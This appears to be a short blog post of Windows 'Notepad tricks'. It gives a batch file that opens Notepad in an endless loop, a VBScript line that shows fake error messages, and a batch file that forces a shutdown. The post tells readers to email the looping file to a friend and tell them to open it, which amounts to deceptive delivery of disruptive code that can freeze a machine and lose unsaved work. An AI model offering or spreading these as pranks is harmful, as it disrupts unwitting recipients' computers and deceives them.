Social Icons

Pages

Jul 15, 2017

Open Notepad Continue in Your Computer

This Notepad trick to play with your Computer System of Friends Computer would be to set off a command which would open his/her notepad repetitively.
Open Notepad and Type (Copy & Paste) this code.
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top


Save it as a .bat file (example- Anand.bat)
and Open this file and see Magic.
This file send through mail your friend and say open.
Enjoy.

Fake Windows Errors With Notepad (Windows_XP)

You can create Fake error message . To do this, follow these steps:
  1. Open Notepad
  2. Type X=Msgbox(“Message Here”,0+16,”Title Here”)
  3. Replace Message Here and Title Here with your Error Message and Error-Window Title respectively.
  4. Save the file with error.vbs.
  5. Now, click the file and you’ll get your custom-made Windows error message.

Forcefully Shutdown Windows

This trick will let you force shutdown your Windows in a single-click. 
  1. Open Notepad
  2. Paste @echo off in first line.
  3. Paste msg * Shutdown computer in second line.
  4. Paste shutdown -c “Sleep Tight” -s in third line




  1. Save the file with .BAT extension. For example, shutdown.bat
  2. Click on your file and it will automatically shutdown your Windows.